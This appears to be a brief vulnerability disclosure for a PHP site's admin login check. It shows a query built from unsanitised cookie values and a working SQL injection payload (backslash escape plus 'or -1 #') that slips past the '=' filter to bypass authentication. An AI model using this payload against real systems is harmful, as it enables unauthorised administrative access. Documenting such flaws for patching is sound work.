backstage_access_control
Vulnerabilities is exist \Include\contorl.php 128 line
Function checkuser is Determine whether the user is logged in or not
In line 187
$query=$db_conn->query("select * from sc_user where user_admin='$cookieuseradmin' and user_ps='$cookieuserpass'");
Variables $cookieuseradmin and $cookieuserpass are obtained from cookies
And through test_input() and verify_str() two detection functions

So,Universal password "or 1 = 1" is not feasible. The equality sign is filtered in the verify_str function. But! Password "or-1" is OK,So the final payload is:
Payload:
select * from sc_user where user_admin='\' and user_ps=' or -1 #'
